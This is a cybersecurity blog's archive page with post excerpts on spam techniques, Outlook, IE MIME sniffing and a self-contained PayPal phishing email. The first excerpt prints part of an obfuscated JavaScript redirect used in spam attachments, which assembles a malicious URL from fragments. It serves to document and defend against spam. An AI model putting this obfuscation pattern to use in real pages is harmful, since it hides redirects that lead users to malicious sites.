HTML | Sorin Mustaca on Cybersecurity

New Spammer’s Compendium Entry:The Responsibility Transfer

Source: http://www.virusbtn.com/resources/spammerscompendium/responsibility.xml The Responsibility Transfer UO!Responsibility!JavaScript 31 August 2010 Description Using an attached HTML document that contains almost the same page as the HTML-part of the email body, but uses obfuscated JavaScript to redirect the user to a malicious website. Submitted by Sorin Mustaca. Example <script>function r(){};fQ=false;d="";r.prototype = {p : function() { this.j='';var pN=54899;s=false;this.k="k";this.kH=22581;c='';l=64422; document.location.href=String("htt"+"p:/"+"/tr"+"ace"+"boo"+"k.u"+"s/1"+".htOnc".substr(0,3)+"ml"); […]

September 2, 2010

News

10 reasons why I hate MS Outlook

1. It is crashing continuously because it is locked in some intensive I/O and the OS (yes, *their* own OS) is killing the application as being non responsive. 2. Lack of good plugins. In contrary to Thunderbird where there are thousand of plugins, the really good plugins for Outlook are very few. 3. Eats up […]

August 31, 2009

General

Bug or feature: Mime Type Detection

Also known as MIME Sniffing, this is a feature or bug in IE which is the only browser able to dynamically determine the content type of the document it loads. So, in this case, it detects a plain text document with HTML content instead of a an JPG header. And the content of the “JPG” […]

March 27, 2009

Spam & Phishing

Paypal phishing w/o hosted HTML files

It is the first time I can see a phishing that doesn’t have a website to store the website ! This email came as a self sustained phishing solution. It is written in HTML and JS and it has a FORM whos action is POST to a website which saves the data. The submit button […]

August 3, 2006